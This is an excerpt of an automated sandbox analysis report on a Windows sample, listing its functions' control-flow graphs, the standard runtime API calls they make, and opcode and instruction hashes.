                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4b4fb540ac52640e03edab883d0c110e3fd3b07b94420992bf0eda264adc5033
                            • Instruction ID: 81ccf8928780f65647065c5add6b1b712b72340e6756cc340dcabbde58d1f475
                            • Opcode Fuzzy Hash: 4b4fb540ac52640e03edab883d0c110e3fd3b07b94420992bf0eda264adc5033
                            • Instruction Fuzzy Hash: A4E08C72A11238EBCB28EB8CC904D8AF7ECEB84A14B110096B601F3610C270EE00DBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c0b25485300886a8ac7243da4b52b6c6a9e7c33ac65ee1175380eaf7e90c9c0
                            • Instruction ID: 17f98388f9513b784f885298b08f1a268ae0f94ac3e81c1286193731bdef7f8e
                            • Opcode Fuzzy Hash: 6c0b25485300886a8ac7243da4b52b6c6a9e7c33ac65ee1175380eaf7e90c9c0
                            • Instruction Fuzzy Hash: D9C08C38100A8047CE2ADB18C6743A433B4B3D168AF80048DC6020B753C51EA8C2DA00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 43 1337591-133759b 44 133762d-1337630 43->44 45 13375a0-13375b1 44->45 46 1337636 44->46 48 13375b3-13375b6 45->48 49 13375be-13375d7 LoadLibraryExW 45->49 47 1337638-133763c 46->47 50 1337656-1337658 48->50 51 13375bc 48->51 52 13375d9-13375e2 GetLastError 49->52 53 133763d-133764d 49->53 50->47 55 133762a 51->55 56 13375e4-13375f6 call 13372e8 52->56 57 133761b-1337628 52->57 53->50 54 133764f-1337650 FreeLibrary 53->54 54->50 55->44 56->57 60 13375f8-133760a call 13372e8 56->60 57->55 60->57 63 133760c-1337619 LoadLibraryExW 60->63 63->53 63->57
                            APIs
                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 01337650
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeLibrary
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 3664257935-537541572
                            • Opcode ID: b7bb5b0055c9b6059225185cbd2260b5724b9761d7926f5c90da1581c3428140
                            • Instruction ID: b468bfdbf44ea171d2415dac5f2318accff6e0b95bf5d05eb38feade07d9141a
                            • Opcode Fuzzy Hash: b7bb5b0055c9b6059225185cbd2260b5724b9761d7926f5c90da1581c3428140
                            • Instruction Fuzzy Hash: 72215CB5A00215ABDB329B6CEC50B5A376C9B81778F100214ED05E7296DB30F900DBE8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • __EH_prolog3.LIBCMT ref: 0132696E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 01326978
                              • Part of subcall function 01321A30: std::_Lockit::_Lockit.LIBCPMT ref: 01321A4C
                              • Part of subcall function 01321A30: std::_Lockit::~_Lockit.LIBCPMT ref: 01321A69
                            • ctype.LIBCPMT ref: 013269B2
                            • std::_Facet_Register.LIBCPMT ref: 013269C9
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 013269E9
                            • __EH_prolog3.LIBCMT ref: 01326A03
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Facet_Registerctype
                            • String ID:
                            • API String ID: 299345219-0
                            • Opcode ID: ef2c9181242a92aa49128497533181e98147a1347bdcd0132618a2e8466b4810
                            • Instruction ID: 49ccd1054aba2f0c3f66f84bee08be1d95f7896a2534b7d9578c82235bf18b2c
                            • Opcode Fuzzy Hash: ef2c9181242a92aa49128497533181e98147a1347bdcd0132618a2e8466b4810
                            • Instruction Fuzzy Hash: 71318D74A00226DFCB65EF68C541AAEBBF1BF58718F20494DD949AB350DB70EA05CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 100 13228d0-1322957 call 1322bc0 call 1325f40 call 1324c70 107 132297a-13229b5 call 1325390 100->107 108 1322959 100->108 118 13229b7-13229c0 107->118 119 13229cc-1322a45 call 1325c70 call 13245c0 FreeConsole call 1329a1a call 1322bc0 107->119 109 1322960-132296e call 1322c80 call 13249c0 108->109 116 1322973-1322978 109->116 116->107 116->109 118->119 123 13229c2-13229c8 118->123 130 1322a47-1322a4e call 1321180 119->130 131 1322a5a-1322ab7 119->131 123->119 134 1322a53-1322a58 130->134 133 1322ac0-1322ae8 131->133 135 1322af2-1322b06 133->135 136 1322aea-1322af0 133->136 134->130 134->131 137 1322b10 call 1322540 135->137 138 1322b08-1322b0e 135->138 136->133 136->135 141 1322b15-1322b19 DdeQueryNextServer 137->141 138->137 139 1322b1f-1322b25 138->139 142 1322b27-1322b38 139->142 143 1322b54-1322b68 call 1329a4a 139->143 141->139 145 1322b4a-1322b51 call 1329a4a 142->145 146 1322b3a-1322b48 142->146 151 1322b97-1322ba9 call 1329a0c 143->151 152 1322b6a-1322b7b 143->152 145->143 146->145 148 1322baa call 1330f7d 146->148 157 1322baf-1322bb4 call 1330f7d 148->157 154 1322b8d-1322b94 call 1329a4a 152->154 155 1322b7d-1322b8b 152->155 154->151 155->154 155->157
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ConsoleFreeNextQueryServer
                            • String ID: dujbe %d
                            • API String ID: 2148023521-1406644930
                            • Opcode ID: 65a68ec1ce278726fe6d5630ead6109521d008a488a9a5d9d75dd60f19cb32c3
                            • Instruction ID: cc4a413c862f5e3fcff57afe97e1f76b64ec6288a1f6cdb270b3e8a675b76182
                            • Opcode Fuzzy Hash: 65a68ec1ce278726fe6d5630ead6109521d008a488a9a5d9d75dd60f19cb32c3
                            • Instruction Fuzzy Hash: 46819E71A083518BD714EF28C84476BBBE1FFD9358F184A1DF99593260EB30E9848B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 163 1321920-1321966 call 1326610 166 1321978-1321982 call 13267d7 163->166 167 1321968-132196a call 1327ff1 163->167 171 132196f-1321975 167->171
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 01321925
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0132196A
                              • Part of subcall function 01327FF1: _Yarn.LIBCPMT ref: 01328010
                              • Part of subcall function 01327FF1: _Yarn.LIBCPMT ref: 01328034
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                            • String ID: bad locale name
                            • API String ID: 1908188788-1405518554
                            • Opcode ID: 4bb056879ce71d53964fa742d007769a603469e2d5503307c29653f78fcd3d7b
                            • Instruction ID: 22d61b5b443a30512bf8ae7c330cbf22e35c62cbf63f73b594a1260939719a83
                            • Opcode Fuzzy Hash: 4bb056879ce71d53964fa742d007769a603469e2d5503307c29653f78fcd3d7b
                            • Instruction Fuzzy Hash: A3F09AB0104B908ED370EF398800703BEE0AF28618F048E1ED4CAC3B41E3B4E108CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • GetCurrentProcess.KERNEL32(01334EA7,?,01334D4B,00000000,?,?,01334EA7,51F7B458,?,01334EA7), ref: 01334D62
                            • TerminateProcess.KERNEL32(00000000,?,01334D4B,00000000,?,?,01334EA7,51F7B458,?,01334EA7), ref: 01334D69
                            • ExitProcess.KERNEL32 ref: 01334D7B
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: abaee9ef49b33c7e18e920841fcd058f5f1aa4660e0f8e08e74359a5301b19f2
                            • Instruction ID: ae8e8518ea7153a98c3a193e3d0bd6364a025a2505529e2398a1762f6bd3083f
                            • Opcode Fuzzy Hash: abaee9ef49b33c7e18e920841fcd058f5f1aa4660e0f8e08e74359a5301b19f2
                            • Instruction Fuzzy Hash: A5D09235010148BFCF613FA8DC0C98D3F2AEF90745B448050B9094A02ACF39A9969B94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 179 133aae4-133ab03 180 133ab09-133ab0b 179->180 181 133acdd 179->181 182 133ab37-133ab5d 180->182 183 133ab0d-133ab2c call 1330ef0 180->183 184 133acdf-133ace3 181->184 186 133ab63-133ab69 182->186 187 133ab5f-133ab61 182->187 192 133ab2f-133ab32 183->192 186->183 188 133ab6b-133ab75 186->188 187->186 187->188 190 133ab77-133ab82 call 133c675 188->190 191 133ab85-133ab90 call 133a668 188->191 190->191 197 133abd2-133abe4 191->197 198 133ab92-133ab97 191->198 192->184 199 133abe6-133abec 197->199 200 133ac35-133ac55 WriteFile 197->200 201 133ab99-133ab9d 198->201 202 133abbc-133abd0 call 133a22e 198->202 203 133ac23-133ac2e call 133a6e6 199->203 204 133abee-133abf1 199->204 207 133ac60 200->207 208 133ac57-133ac5d GetLastError 200->208 205 133aba3-133abb2 call 133a600 201->205 206 133aca5-133acb7 201->206 218 133abb5-133abb7 202->218 224 133ac33 203->224 211 133abf3-133abf6 204->211 212 133ac11-133ac21 call 133a8aa 204->212 205->218 213 133acc1-133acd3 206->213 214 133acb9-133acbf 206->214 210 133ac63-133ac6e 207->210 208->207 219 133ac70-133ac75 210->219 220 133acd8-133acdb 210->220 211->206 221 133abfc-133ac07 call 133a7c1 211->221 229 133ac0c-133ac0f 212->229 213->192 214->181 214->213 218->210 225 133aca3 219->225 226 133ac77-133ac7c 219->226 220->184 221->229 224->229 225->206 230 133ac95-133ac9e call 1331034 226->230 231 133ac7e-133ac90 226->231 229->218 230->192 231->192
                            APIs
                              • Part of subcall function 0133A22E: GetConsoleOutputCP.KERNEL32(51F7B458,00000000,00000000,?), ref: 0133A291
                            • WriteFile.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?), ref: 0133AC4D
                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000,?,?), ref: 0133AC57
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ConsoleErrorFileLastOutputWrite
                            • String ID:
                            • API String ID: 2915228174-0
                            • Opcode ID: 727fd10d2bd3b61e30d7f52ad2e02f59234a9f096165c3b3cec50af90353c0ba
                            • Instruction ID: 62fab1564f7ea9d35b134ec5644e4697ab5790035eb52c28a97297621c41cd02
                            • Opcode Fuzzy Hash: 727fd10d2bd3b61e30d7f52ad2e02f59234a9f096165c3b3cec50af90353c0ba
                            • Instruction Fuzzy Hash: 2961AF71D04249AFEF15CFACC884AEEBFB9AF89318F044585E981E7252D335D905CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 234 133a6e6-133a73b call 132a7e0 237 133a7b0-133a7c0 call 1329a0c 234->237 238 133a73d 234->238 240 133a743 238->240 242 133a749-133a74b 240->242 243 133a765-133a78a WriteFile 242->243 244 133a74d-133a752 242->244 247 133a7a8-133a7ae GetLastError 243->247 248 133a78c-133a797 243->248 245 133a754-133a75a 244->245 246 133a75b-133a763 244->246 245->246 246->242 246->243 247->237 248->237 249 133a799-133a7a4 248->249 249->240 250 133a7a6 249->250 250->237
                            APIs
                            • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0133AC33,?,00000000,00000000,?,00000000,00000000), ref: 0133A782
                            • GetLastError.KERNEL32(?,0133AC33,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0133A7A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID:
                            • API String ID: 442123175-0
                            • Opcode ID: 43fc5236d15373a3cba56611de08f1e5561e8fcb6ff835f3aa995d43fa79e33a
                            • Instruction ID: e5505b007ed107431b5bdf2d313800e5290b0267879305592c783b39ebe82503
                            • Opcode Fuzzy Hash: 43fc5236d15373a3cba56611de08f1e5561e8fcb6ff835f3aa995d43fa79e33a
                            • Instruction Fuzzy Hash: 0A21A674A102199FCB16CF59DCC0AD9B7F9EF88305F1440A9EA46D7211D630DE46CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 251 1337ce4-1337ce9 252 1337ceb-1337d03 251->252 253 1337d11-1337d1a 252->253 254 1337d05-1337d09 252->254 256 1337d2c 253->256 257 1337d1c-1337d1f 253->257 254->253 255 1337d0b-1337d0f 254->255 258 1337d86-1337d8a 255->258 261 1337d2e-1337d3b GetStdHandle 256->261 259 1337d21-1337d26 257->259 260 1337d28-1337d2a 257->260 258->252 262 1337d90-1337d93 258->262 259->261 260->261 263 1337d68-1337d7a 261->263 264 1337d3d-1337d3f 261->264 263->258 265 1337d7c-1337d7f 263->265 264->263 266 1337d41-1337d4a GetFileType 264->266 265->258 266->263 267 1337d4c-1337d55 266->267 268 1337d57-1337d5b 267->268 269 1337d5d-1337d60 267->269 268->258 269->258 270 1337d62-1337d66 269->270 270->258
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 01337D30
                            • GetFileType.KERNELBASE(00000000), ref: 01337D42
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileHandleType
                            • String ID:
                            • API String ID: 3000768030-0
                            • Opcode ID: 8c82c96d1853bf4dc4e9e3edc38580f5682e823b3bb8f7962b3d8a44eba72b8f
                            • Instruction ID: d7ae69b612ee04d40832964bbb426dfe4987b4f708beb54a2940216d51a7a83c
                            • Opcode Fuzzy Hash: 8c82c96d1853bf4dc4e9e3edc38580f5682e823b3bb8f7962b3d8a44eba72b8f
                            • Instruction Fuzzy Hash: 891196B31047595AD7304D3E8C8CA327E99ABD6139B38071AD1B6875F2C730D586D658
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 271 1328956-1328975 272 1328977-1328979 271->272 273 132897b-1328983 271->273 274 13289d7-13289e4 call 1329a0c 272->274 275 1328985-132898f 273->275 276 13289a8-13289ac 273->276 275->276 278 1328991-13289a3 275->278 279 13289d1 276->279 280 13289ae-13289bd call 13285ff 276->280 283 1328a5e-1328a61 278->283 281 13289d6 279->281 286 13289e7-1328a1c 280->286 287 13289bf-13289c2 280->287 281->274 283->281 293 1328a31-1328a39 286->293 294 1328a1e-1328a21 286->294 288 13289c3 call 1328132 287->288 291 13289c8-13289cf 288->291 291->279 291->281 295 1328a3b-1328a4c call 1332268 293->295 296 1328a4e-1328a58 293->296 294->293 297 1328a23-1328a27 294->297 295->279 295->296 296->279 296->283 297->279 299 1328a29-1328a2f 297->299 299->288
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: Fputc
                            • String ID:
                            • API String ID: 3078413507-0
                            • Opcode ID: 1f0241f15436ea2eba1c00d035a0916e043fc3333a6a06682824a4479eb86ed7
                            • Instruction ID: 732cb9b464f452e663c3c185828a6830b5a1dd72fb1583548676074d596ccc08
                            • Opcode Fuzzy Hash: 1f0241f15436ea2eba1c00d035a0916e043fc3333a6a06682824a4479eb86ed7
                            • Instruction Fuzzy Hash: B2316072A0012AAFDF15EF68C8509EEB7F9BF09318F1401A6E541E7640EB31E954CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 301 133765a-1337682 302 1337684-1337686 301->302 303 1337688-133768a 301->303 304 13376d9-13376dc 302->304 305 1337690-1337697 call 133758f 303->305 306 133768c-133768e 303->306 308 133769c-13376a0 305->308 306->304 309 13376a2-13376b0 GetProcAddress 308->309 310 13376bf-13376d6 308->310 309->310 311 13376b2-13376bd call 13344d2 309->311 312 13376d8 310->312 311->312 312->304
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fffe433d0b2946d02068e81f7e6c097ad678c386ac7829efe7f2184b7ec35e4f
                            • Instruction ID: ce8ff2063dc234d7dd0b50d120037bb6165220b07f4b21ca677140222823dce8
                            • Opcode Fuzzy Hash: fffe433d0b2946d02068e81f7e6c097ad678c386ac7829efe7f2184b7ec35e4f
                            • Instruction Fuzzy Hash: 200128B3310316AFEB268D6DEC5095B37AEFBC57387144120FA05DB188DA30D401A798
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 315 1337322-133732d 316 133733b-1337341 315->316 317 133732f-1337339 315->317 319 1337343-1337344 316->319 320 133735a-133736b RtlAllocateHeap 316->320 317->316 318 133736f-133737a call 133106b 317->318 324 133737c-133737e 318->324 319->320 322 1337346-133734d call 1336673 320->322 323 133736d 320->323 322->318 328 133734f-1337358 call 13342ee 322->328 323->324 328->318 328->320
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,013393BF,00000001,00000364,?,00000005,000000FF,?,01342A90,00000000,013369EF,00000000), ref: 01337363
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 504efbff1730bf70c47d99df8fbc03b6f8ddf379f4bebc9d1b70809327ee66b1
                            • Instruction ID: 085a3a7ff26728a0c51e92f9959517a837ce44f8107c856840a731c00ea9066d
                            • Opcode Fuzzy Hash: 504efbff1730bf70c47d99df8fbc03b6f8ddf379f4bebc9d1b70809327ee66b1
                            • Instruction Fuzzy Hash: 08F0E9B1200625E7EB715A6A9C42B5B3F5CAFC07B8F084011ED04EB194CB30D40086EC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 331 13269fc-1326a15 call 1329f45 334 1326a17-1326a33 331->334 335 1326a3a-1326a5f call 1327341 331->335 334->335 337 1326a64-1326a6b call 1329f22 335->337
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID:
                            • API String ID: 431132790-0
                            • Opcode ID: 4fdb6a6f4f3fbf83b50a3329c2bf29d54d26b012b05bc46d5cb2dcd387fb5150
                            • Instruction ID: 2038a78c9f2c6ab5aa77915447cd90bc58c544980ef2bdbb1770737e81730e01
                            • Opcode Fuzzy Hash: 4fdb6a6f4f3fbf83b50a3329c2bf29d54d26b012b05bc46d5cb2dcd387fb5150
                            • Instruction Fuzzy Hash: D801D6B8900725DFC7A5DF68C540A5DBBF0BF18708B50885DE989DB710D771EA45CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 340 1337e20-1337e2c 341 1337e5e-1337e69 call 133106b 340->341 342 1337e2e-1337e30 340->342 350 1337e6b-1337e6d 341->350 344 1337e32-1337e33 342->344 345 1337e49-1337e5a RtlAllocateHeap 342->345 344->345 346 1337e35-1337e3c call 1336673 345->346 347 1337e5c 345->347 346->341 352 1337e3e-1337e47 call 13342ee 346->352 347->350 352->341 352->345
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,013369EF,?,0133D85F,?,00000000,?,01342A90,00000000,013369EF,00000000,?,?,?,013367E9), ref: 01337E52
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 93a952b5947f7482ea4b6c23d798a6ade5579318260a20d62bbee27cc8f4de96
                            • Instruction ID: 80f31d13b565f2e0d3f99628a23561c69a3d00af5eab39107d3fce998525c092
                            • Opcode Fuzzy Hash: 93a952b5947f7482ea4b6c23d798a6ade5579318260a20d62bbee27cc8f4de96
                            • Instruction Fuzzy Hash: 93E0EDB120162A6BE6312B7D9C00B5B7A5D9FC1AF8F150020AE18AA180CB21DC0082FD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
